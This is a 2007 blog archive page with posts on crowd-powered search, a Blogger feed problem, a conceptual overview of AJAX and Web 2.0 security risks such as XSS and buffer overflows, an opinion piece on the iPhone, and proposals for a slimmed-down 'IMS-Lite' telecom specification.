Search This Blog

Saturday, January 27, 2007

Why Artificial Intelligence if you can have Peer-Peer Intelligence ?




It is interesting to note how competitive the search world is getting. The eternal quest for ‘finding the right answer’ is leading this technically advanced generation back to the basics – why not utilize the intelligence of the actual human brain that we are all trying to simulate ?

Solutions like the recently discontinued ‘Google Answers’ and the currently blossoming Yahoo Answers are examples where you can ask targetted questions to ‘experts’, who can provide you with educated answers. However, in this model, the ‘experts’ are usually more qualified than the average Joe. The power of involving real humans is when you can expand in scale, as well as make it attractive for those contributors, in terms of personal profit. In other words, a model that can utilize the ‘spare time’ of millions of people to offer collective intelligence. Another example of this is the recently launched Linked In’s Question tab. For those who don’t know, LinkedIn is a business networking tool that allows you to connect to several industry professionals. I use it a lot as well. Now that LinkedIn has a great network of Friends, Friends of Friends and so on, it makes sense then, to traverse this network to get targetted information. So they launched Linkedin Answers, where a person can ask a “Question” and anyone in the network can answer it. Questions range from “What is the one killer-app you would like in your cell phone” to “How can we make the law more user friendly?”. The answers come from your network, which may include engineers, VPs, CTOs, CEOs of companies who you get to tap for information. The answers are detailed, and often fabulous. I bet you could’nt get the same quality from a plain google search.

Similarly, Google went the human route for Image Search. While you can apply complex word algorithms to textual articles, how do you provide relevant image searches ? How do you know a particular image represents a search query like “long tail theory”. Simple, tap into real humans with the Google Image Labeler. Make it a game, get information in return. Beats the heck out of AI engines.

And then, yesterday, I used ChaCha, the guided search engine. The logic here is again simple, utilize the free time of millions of peers – and have them search for you. They have a huge network of guides, and one guide can invite another. When you launch a ChaCha search, and choose the guided option, a real user responds and chats with you to refine the search. I spent the day talking to several of them – they are real people, who get paid for the hours they log into ChaCha. Depending on which ‘level’ they are graded at (a function of user feedback on their search report, and other factors), they can earn anything between $5 to $10 an hour. I talked to one Guide, a mother of three, who says she loved this ‘part-time job’ – when she needs some extra cash, she logs in, helps people and earns money. When they get ‘promoted’ to a higher grade, their pay can double, she says. I asked if they are trained, and I was told they do go through some level of keyword search training. Personally, I did not find their level of expertise to be any better than the average user (I think I can search far better with advanced search parameters). The challenge, I think, with ChaCha would be to train their people so that more people see a benefit of using their guides. I tested them with search queries for which I knew the answer and waited to see how long they took to get me the right answer but it was an interesting model – I am sure there are many who would find it interesting. It also seems that their payout is heavily based on how I rate their help, so not a single one tried to hurry me. Infact, we even chatted about general things while the Guide searched. I wonder then, if ChaCha like systems could effectively merge search as a service into a larger social networking tool!
See their blog for other ways to increase your payout using this service.

All in all, it is very interesting to see how the human collective is being utilized to provide further personalization to the world of search. While one may have thought that 'Simulated Intelligence' would eventually take jobs away from people, I guess the Internet is balancing this well by reaching out to people and offering them new ways to 'mesh into this new world intelligence' and supplement their living. Infact, I was at Internet Telephony last week, where I spoke on 'Effect of Web 2.0 on Telco World' and in one of the keynotes, Rich mentioned that this particular event was full of Military people, because they wanted to learn how they can use VoIP technology to help those disabled in war to earn a living !
Vive-la-Internet.

Wednesday, January 17, 2007

Reader Warning: Messed up Feed


Feb 09 Update: I found a way to fix blogger's feed sort order. Instead of providing my atom feed to feedburner, I created a Yahoo pipe to sort my feed and provided the Yahoo pipe's RSS to feedburner. So hopefully, after I make this change, you should not see it at the top of the feed. If you do, I have work to do !
Update: Looks like the new Blogger will continue to re-order posts based on update date. Yeesh and !@$!XX!@* again. read more here.

Folks, sorry, but it looks like the feed to my website is completely messed up, ever since I upgraded to Blogger Beta. I use feedburner, which in turn takes it feed from the blogger feed at http://corporaterat.blogspot.com/atom.xml . If you look at that Atom feed, you would notice all my posts are topsy turvy, missing posts, and old posts showing up front. Of course, I should have researched before I upgraded, but it is too late now - I am at the mercy of Google to fix rss.

The positive side: As part of the blogger upgrade is I now have labels (see sidebar) so you can view based on category.

Not sure what I can do about it except yell and scream. So please don't forget to visit this site every once in a while to see what's new.

Web 2.0 and AJAX - fundamentally insecure ?



In the past couple of days, I’ve been delving into supposed security issues that the new Web 2.0 and AJAX enabled sites produce and have been also looking into some claims I heard that for serious applications, one should stick to Flash, since it is inherently more secure, tried and tested than AJAX is today.

To investigate the inherent and publicized security issues within AJAX, we first need to understand the underlying technologies that AJAX uses. Specifically, AJAX comprises of:

a) XMLHttpRequest (XHR)– a new functionality, that has been added to most well known browsers today that allow an asynchronous communication mechanism between the browser and the webserver

b) Client side JavaScript – been around for a long time, an implementation of the ECMA script specification and used as a programming language for many web based applications

To properly assess AJAX related security issues, then, it makes sense for us to take a look at what sort of security issues do these two critical underlying technologies present.

XSS – Cross-Site Scripting attacks – A Javascript and URL handling exploit

The concept here is straight-forward. XSS is not a technology – it refers to a technique, where a malicious user can construct an ‘evil’ input which when passed to a trusted, but vulnerable site, causes that site to compromise it’s users. Consider , for example, a site called www.goodsite.com. Which accepts a search query like so www.goodsite.com/q=mysearch. Now let us assume, that goodsite.com does not do a good job at ensuring that the input provided is validated well. One could construct a URI like www.goodsite/com/q=(insert malicious script code here) and send it off to goodsite. If goodsite let this pass, in effect, the script would be executed in context of the browser session for the user. So, if I were to send you this site URI, and you clicked it, I could for example, hijack your session cookie at goodsite and have it sent to me via embedded javascript (Javascript allows cross-domain HTTP requests). If you think this is trivially avoidable, you’d be surprised at how may ways there are to bypass web server checks. For example, take a look at the myspace exploit that used dynamic HTML and fragmented text blocks to hide substring matches to get caught by the web-server’s parser.

Ideally, one could consider that XSS should be disallowed, or, all webservers MUST ensure that all special characters are ‘safe’ized (encoded using HTML entities) to ensure that they are not interpreted at the remote side, rather, only displayed. However, with the increasing popularity of responsive web sites using AJAX related technologies, Mash-ups are becoming very common, and the ability for one domain to pass on data for remote script execution helps in managing load on the local host. XSS related vulnerabilties have been around for a long time, and have been successful in infecting a variety of web based solutions, including Php boards, google, apache, mozilla, myspace, yahoo and many more.

It is important to note that XSS depends on the following:

a) You somehow pass on a ‘malicious’ URI to a user and get him to click on it (it doesn’t make sense for you to execute the XSS vulnerability in your own browser context, unless you think you can launch a remote exploit due to a buffer underflow or overflow – that is a different attack, and not catagorized under XSS Attacks – more on this later)

b) It makes an assumption that the web-server receiving this information does not do a good job validating input


Effect of Web 2.0 on XSS attacks

Does Web 2.0 impact the risks of XSS attacks? Yes and No. Technically speaking, XSS has nothing to do with Web 2.0 and AJAX. It is a vulnerability that existed much before AJAX as a term was even coined. XSS attacks started surfacing almost as soon as javascript was introduced. However, with the proliferation of Web 2.0 sites, there is a significant increase in collaboration, mash-ups and multi-tenancy which all mean the same thing – there is a larger audience which can now be targetted for vulnerabilities. So the ‘No’ was a technical response. The ‘Yes’ was a market response – due to adoption. However, that is not to say that ‘Web 2.0 results in increased XSS vulnerabilities’. The right statement would be ‘Web 2.0 results in more people using potentially vulnerable techologies, which unless hardened, have a wider possibility of financial and reputation damage’ (heck, sounds like a lawyer crafted that, but you get what I mean). In addition, multi-tenancy (different applications on a single cluster of hosts) means exposed vulnerability of one application can compromise others, unless the multi-tenant host takes very special care of intra-trust-domains (providers usually do a good job of inter-trust-domains, but lag on trust within their own domain, which is why once you get it, you can usually do a lot of damage in periphery nodes).


XMLHttpRequest (XHR) & Javascript Repudiation Attacks

This is really is derivative attack on a compromised site (it is interesting to note most of the attacks rely on implementation gaps of web-servers). Assuming that you manage to get a malicious script code, using XHR you can issue as many HTTP commands in it to automatically, ‘agree to some terms and service’, ‘buy item’ etc. that don’t require any specific user input not known to the environment. The exact same thing is also possible to do with Javascript – so this is not really specific to AJAX only (The only new thing AJAX got in was XHR – Javascript existed much before hat). Since the web-server does not know which request came from an embedded XHR or an explicit user click, it is not possible to differentiate between the two.


Effect of Web 2.0 on Repudiation Attacks

Once again, with the hype and slickness of XHR+JS applications proliferating around the web, more people should concentrate on architectural and data protection besides only focussing on ‘how to make the interface slicker’. So again, Web 2.0 does not technically make the situation worse, but in the surge of trying to get out prettier applications, developers needs to go back to their basics on implementing a secure enviroment for distributed systems and input validation.

(AJAX) Bridging

Bridging is a software concept that has long pre-dated Web 2.0. In effect, it is the process on installing a ‘gateway server’ in between multiple content sources. This ‘gateway server’ maintains a trusted relationship with the backend content servers and is also therefore capable of creating integration logic of how to ‘mesh’ these diverse contents together. This sort of bridging has increased in popularity, with the deployment of mash applications. It introduces another twist to XHR attacks. XHR cannot access HTTP pages which are outside the domain which is being served. For exampl
e, if a script was running at www.google.com, XHR can’t make a HTTP request to www.yahoo.com . However, if the application is being hosted on a bridge server, then one could use the bridge server URI to access content in the other backend site (for example, if the bridge server knowingly or un-knowingly supports URI redirection). Do note that Javascript also supports this capability, so you don’t need XHR for this. However, now that Browsers also support XHR, even if JS is disabled or blocked, one could launch similar exploits without it. What then happens is that by transitive relationship, if Yahoo were to offer its APIs to a trusted site, the users of that trusted site could now target attacks on Yahoo using common tricks like SQL injection, DoS (repeated HTTP requests via XHR in bulk) and similar.

Effect of Web 2.0 on XHR Bridging Attacks

Web based mash-up applications are proliferating today. The use of bridge servers to blend content from multiple sites are getting much more common place today (for instance, mashing google maps with craigslist, house searches and more). In any architecture, the fundamental principle of ‘a chain is only as strong as it’s weakest link’ applies equally here.

Javascript ‘Script Kidde’ Tricks

This is a compendium of many tricks which have plagued immature implementations of Javascript. Many of these tricks are very irritating and can destroy user experience. For example, Pascal Meunier maintains a list of some of these irritants, which work even today on the most recent of browsers, and they include:
a) Dynamically generating a fake page for a valid URI – a simple javascript trick where if you visit http://bad.com and click on a link there for ‘google.com’ it can result in your browser URL changing to google.com but displaying some other crafted page (it works in IE7, FF2.0 smarly displays the URL redirection)
b) Nasty JS code that traps browser events and does not let you navigate away from the page, unless you close the browser

And more.

Ofcourse, JS being a programming language, it can also be used for more serious purposes – like port scanning your own network and potentially reporting found results to an external site.

Effect of Web 2.0 on JS Vulnerabilties

Most of the web 2.0 world relies heavily on Javascript. Infact, I can point you to hundreds of sites, that blindly download ‘JS+XHR (AJAX) toolkits’ like prototype.js or others and start using their functions. Just an an example, prototype.js is a 64KB file densely packed with XHR and JS code. How many people actually look into that file ? What stops me from hosting a malicious prototype.js file and having people download that file and use it in their own context and have their context sensitive information sent out ? With the increasing use of JS in commercial sites in quest for a better user experience, the inherent implementation gaps of JS interpreters in browsers have a capability to do much more damage, simply due to a function of it being used in many more mainstream functions than before.

XHR+JS insecurities vs. Flash

Comparing this to Flash, when I googled around for vulnerabilities, most of them I came across, were to do with buffer exploits. Simply put, buffer exploits are set of techniques where a malicious user finds a spot of executable code that does not check for input length, and using that, provides a large enough string which overflows the allocated stack for that string. In addition to that, the string is crafted with machine opcodes at the right place, which causes the return address from that function to reach an address within that string, which is actually an encoded instruction set. Effectively it means that the remote user has managed to execute code on the remote platform, thereby launching an internal attack. Such attacks are very old and still prevalent. A great tutorial (old, but gold) for buffer exploits can be read here.

So while I found such buffer exploits, I did not have much success in finding actionscript related exploits similar in nature to those mentioned above. I did find references to ramdom posts on forums that said a few years ago, actionscript from Flash was in a similar stage, but it seems over the years, the implementation has improved. Again, this was a cursory look – I’d be happy to be pointed to similar exploits in the Flash world.

Buffer exploits will always remain – detecting and compromising buffer exploits don’t need an open programming language interface like JS. These exploits require more skill to probe and compromise (yes, I am aware of automated buffer exploit scanners, but applying them to different environments requires more skill) and is usually an art for a smaller niche community.

However, in the entire flash vs. AJAX security debate, I do have another concern. JS and XHR exploits need to be fixed by the ‘browser’ owners – Microsoft, Mozilla, Apple and others. Flash exploits need to be fixed by Adobe and can be done independent of the browser, since Flash is a 3rd party browser plugin, while JS and XHR are core browser implementations. I wonder if this would mean that relying on browser companies to fix issues takes a longer time than relying on Adobe to fix a plugin-issue. Anyway, as Web 2.0 with AJAX continues to go mainstream, only time will tell.

Conclusion

What we observe, then, is that most of the vulnerabilties of AJAX are little to do with AJAX and more to do with inherent vulnerabilties of immature implementations and bad architectural choices by developers. Most of the vulnerabilities above boil down to:

a) User Input is not validated well
b) Data Integrity and logical firewalling is not thought out well
c) Current implementations of javascript in browsers is rather dismal
d) If your architecture is insecure, no technology can rescue you

What Web 2.0 is doing is making these technologies mainstream. As more people use it, many more bugs come out, and many more people think of hacking insecure sites for fun and profit (nothing new with that). I think overall, this will be beneficial for the web community - there is nothing like taking a technology mainstream to make it robust ! But in the process, developers and marketeers need to be aware that this is an evolving process and should do everything possible to safeguard their own data from the imperfections in the implementation of their chosen tools.

References
http://namb.la/popular/tech.html
http://ajaxian.com/by/topic/security/
http://www.technicalinfo.net/papers/CSS.html
http://insecure.org/stf/smashstack.html
http://www.actionscripthero.co
m/adventures/

http://www.viruslist.com/en/analysis?pubid=184625030

Thursday, January 11, 2007

iPhone: The world's best micro-tablet ... not Phone





So by now, everyone must have been pouring in and arguing all about the iPhone device that Apple Computer released at CES(oops) Macworld. If you missed the master-presenter, Steve Job's video, you can see it here.

As I see it, the iPhone is a marvelous design. No question about it. Infact, when Steve started by saying "The Killer App is making a call !" I thought he got it right on. Consumers want good voice, easy use, reliable communication. But then as he went on to talk about Photoalbums, using two fingers to zoom in and out, and so forth, I wondered what it had to do with 'making a call'. Having said that, I thought the Random Access Voice mail feature is very nice and very useful. Ofcourse, this is a feature that is not restricted to the iPhone - I bet it will come in on all phones with even the smallest LCD - since this is really a network side feature.

How much the iPhone means to you depends on whether you consider your phone as a 'lifestyle' device or a 'communication device'. When the iPod was released, it effectively turned around the portable music player industry as we knew it. A lot of it was attributed to it's design but an equal amount of importance was attributed to its 'clickweel' tactile feedback and responsiveness.

Now don't mistake me for a 'old timer' - in my professional job, I am neck deep into mobile applications and am rather excited about the new applications that one could potentially host on the iPhone, considering its excellent video and screen size, but I do feel that the iPhone is not a revolution for the phone industry, and here is why:

a) The penetration of mobile internet usage world wide is only a small fraction of the revenues of voice calls to justify a 'communication' device needs to be better at surfing than voice calling (which means, not too many people actually surf the net with the phone. Specifically, I recently read a report which sights that in the US, mobile internet penetration is 19% while in EU it is 24% or so - I apologize, I don't have the link for this right now source). So I'll bet a vast majority of people in the world need a good phone far above a good photo album device, if they need to carry only one device in their pocket. (see this too)

b) If you look at world wide sales of mobile devices, it is interesting to note that Nokia, Samsung and pretty much most of the major players state that bulk of their revenues come from low-tech phones - no fancy LCDs, no fancy touchscreen. While they all see a rise in sales of smartphones, competition on the other hand also drives down their price. Again, these figures simply describe a global market trend across a wide spectrum of people profiles. It is not necessarily the intent of smartphones to overtake sales of 'dumb-phones', but an observation nonetheless of user trends.

b) Tactile feedback is of utmost importance. Take the case of TV remotes. All LCD remotes have been around for a great while. Yet, their sales are miniscule compared to plastic-key remote controls. Do you know why ? People don't want to keep looking at their phones all the time to do things. When I get a call, and am driving, I feel around for my 'answer' key and hit it. As I type this email, not once am I looking at the keyboard - I feel the keys and their location - and the tactile feedback makes my speed much faster. You know what has the potential to change the landscape of the phone industry and yet keep tactile feedback ? How about shape changing plastic ? But who knows when it will be ready for consumer grade use. A touch-screen LCD is a touch-screen LCD, no matter how many applications you stuff into the iPhone.

c) Multi touch sensors are really very nice. When I first saw a demo at Ted here by Jeff Han, I was very impressed. But I am not sure how great multi-touch is for such a small screen as the iPhone. People get carpal tunnel syndrome from keeping their thumb apart for the spacebar in a regular keyboard. I wonder what new syndromes will be discovered as users start using two fingers to 'squeeze' or 'expand' their browser screen :-) Yes, I saw minority report, and Tom Cruise's multi-touch sensor virtual screen was fabulous. But that was a 72 inch giant, not a little pocket screen.

d) I hate grease and smudge on my phone :-) Between calls, I keep rubbing my blackberry screen against my shirt, with my keyboard locked. Gee, the finger slide to unlock the iPhone looks easy to bumble up on, and there is so much more LCD real estate for me to smudge. I know Apple has used as smudge free a screen as possible, but 'Smudge-free' is almost like 'Wrinkle-free' - not really.

d) Again, repeating Mr. Job's first statement 'The killer app is making a voice call', I think the iPhone does not really believe that, if a battery life of 5 hours is considered.

e) Ummm, really, what happens if it falls ten times during a month on the floor. It is reality ! I keep my phone in my pocket all the time and I often bend down and out it pops with a large thud on my floor.

So all in all, for me 'my ONE communication device needs to be'
a) Foremost, an easy to use phone with great voice and clear quality
b) Should be able to withstand falls ( I don't claim to drop it from 3 storey buildings - but the usual pop out from the pocket)
c) Tactile feedback, so I don't need to always see what I am doing

I am glad that they chose to go with GSM. I know in the US, GSM's coverage is still not as good as CDMA, despite Cingular's claims, but I think it is the right direction.

So finally, to me the iPhone is a great secondary device and for those who value making a statement more than effective use, it would be a great device. And it does need to be mentioned, that Apple is not the first here - the Asian market has had innovative touch screen designs for mobile devices for a while. If you visit Korea or Japan, you will know what I mean. Of-course, they don't follow with the fabulous marketing here in the US. If you don't believe me, google for LG KE850.

Of course, the iPhone does not need to be a phone replacement to be successful. The success of the blackberry was that it offered push email and a great keyboard and scroll wheel - it's phone quality wasn't as great as traditional cell phones. I can quite see the iPhone being an immediate hit in Hollywood as well as teens with rich parents.


But I wonder, if instead of calling it a 'phone revolution' , 'micro-tablet revolution' (while also makes calls) is a more apt title ?

(Update on Sep 14 2007)

It looks like people keep re-discovering this post of the iphone. With the successful
release of the phone, and the subsequent $100 credit and $200 price drop, it is natural that people are on the lookout. Since this post,which was mostly postulating on my part, since it was authored before the iphone was released, several folks have sent me emails asking what I think now, assuming I have tried it. So here are some responses


a) Have I tried it ? Yes, many times. Kept it with me a couple of days too so I can make sure I get a good feel (you know, sometimes, irritants are just things one needs to get used to)

b) Will I buy it ? Not yet. Not because of the price - I am known to spend a lot of money on gadgets :-). But because of the following:

b.1) typing is a big pain. No tactile feedback. Typing on virtual keys is very slow (comparing to blackberry). And over a few days, I kept pressing the wrong keys. Drag-typing works, but that's really slow typing.
b.2) No corporate email integration yet (I hear they are working on it)
b.3) Audio quality is at the same level as a blackberry (which is not that great). So if it's audio was significantly better, it would be a great incentive.

c) Did any of my opinions change after using it ? Well, yes - one. The smudge part. It is very easy to smudge the iphone, but also very simple to wipe it off with any cloth. So it did not bother me as much as I thought.

Tuesday, January 9, 2007

IMS-Lite

(this post is somewhat ad-hoc right now. I may clean it up later)

Okay, after reading Steve Job's macworld 2007 report by engadget on the iPhone, I really don't feel like talking about bellhead technology, but here goes..


Just about when a set of specifications gets too ambitious and onerous, a vendor’s engineering department concludes that they really need something ‘leaner’ for their particular market. At the same time the marketing department wants to ride the wave of popularity by associating their ‘leaner’ product to a well known acronym. As a result, you get xxx-Ready or xxx-Lite, where the former effectively means ‘we don’t support xxx yet, but we sure can, since our product has great open interfaces, and has architected by the best architects in the world, believe us’ and the latter effectively means ‘we sliced and diced xxx, selected the parts we need, threw the others away, and it may not really be a 100% compliant to xxx but it is 100% complaint if you use us and our partners exclusively’.

‘IMS-Lite’ is a term that is floating around in the market today and is being used by several vendors to describe a ‘subset’ of functionality as well as ‘tweaks’ to the base specs to suit their needs. Of course, there is no standard for IMS-lite. If there were, it would be as complex as the base IMS specs itself. Different vendors/operators have different takes on IMS-Lite, depending on which network is their primary deployment requirement. Most of the IMS-lite terminology comes for non-cellular operators who don’t want to carry all the baggage of the cellular world, but want to be able to interconnect. It is interesting to note that the core specs actually make most of the point stated below optional, but all the examples and deployments use them, since they are deployed by cellular operators, and hence one gets the feel that all of the features must be supported.

Here is a brief on various 'thoughts' on what an IMS-Lite should look like (not specific to any vendor):

Architecture
  • Merge the P, C and I CSCF into one entity, call it the ‘Call Router’ if you wish. Even though they are logical functions, the interactions between them are one too many – let vendors decide how they implement the internal functions, as long as externally, they support SIP and DIAMETER. This itself reduces the specs significantly.
  • Ditch the Initial Filter criteria – the iFC is the XML spec and workflow of how a CSCF selects an appropriate AS and/or performs local services like call barring. How does it matter how a filter is implemented ? Let it be a vendor decision
  • Abstract the HSS - one of the biggest pain points of non cellular operators, such as enterprises, to connect with the IMS is that there is no way they are willing to share their user data and have it hosted in an operator’s network. So allow data federation, and allow a mechanism where the ‘central data store’ could be located in either the master or the access network and define a security protocol between the master and access network to allow for such federation
  • Kill the ‘OSA-SCS’ and ‘IM-SSF’ application servers – which magically convert OSA and CAMEL services magically to SIP. I don’t know how such magic can effectively happen. Non SIP services don’t have a 1-1 mapping with SIP flows. IF one needs to provide non SIP services, hand the call off to a terminating SIP UA server that knows how to maintain service state of the non-SIP protocol on the other side. In other words, the ‘OSA-SCS’ and ‘IM-SSF’ define functionality that the gateway AS will do anyway.
  • Move the concept of ‘Home’ and ‘Visited’ to an appendix. Unless it is an expensive over the air proposition, it doesn’t really matter, from the signaling plane, if I am calling from Tahoe and my ‘home’ network is in Timbuktoo. From a media perspective, however, it does matter, especially if it MUST route through a media node for bandwidth allocation and Legal Intercept. These are, however, public operator requirements and are mandated in enterprises, for example.
  • When a UE registers, have it negotiate how it will report charging. The reason is simple – IMS defines an extensive distributed method for charging for on-line and off-line systems. In the case that the network can guarantee that all calls and/or media will flow through it’s nodes, the entire charging participation from end nodes reduces.

Identity
  • The entire USIM/ISIM algorithms need to be pushed to an appendix. How one computes its ‘public’ identity is a network matter. For example, enterprise phones are ‘provisioned’ with static identities – there is no SIM card.

Security
  • Make 33.203 an option, not strongly referenced. Instead do a good job of 33.978. In other words, don’t require implementations to exchange a two way IPSEC SA with the P-CSCF. Many networks can depend on the underlying layer’s security. 33.978, which is called ‘Early registration’ is a start, but for example, it does not yet support WLAN based UE authentication
  • Specify HTTP/Digest as another allowable authentication method –it works just fine assuming that a lower layer provides encryption, which is very common with enterprises

Nits
  • For lord’s sake, provide examples of simple call flows without preconditions in 24.228 (The core IMS architecture document)! For example, did you realize why UPDATE is needed before the 180 ringing on the remote side ? That is to ensure that the remote phone does not ring its user and then have the phone disconnected because bandwidth could not be reserved.
I could go on and on…. especially while discussing behemoth efforts such as Voice Call Continuity, PTT and the rest of services.
But wait, what is it that you say “What I am proposing is what already exists today in Wireline SIP/VoIP deployments and that is not really IMS ?”. Gee maybe you are right. And maybe that is what IMS-lite is ? But seriously, I think IMS would benefit from abstracting out a lot of the celluar specific procedures from its core specifications, if it now desires to be used across multiple access stratums.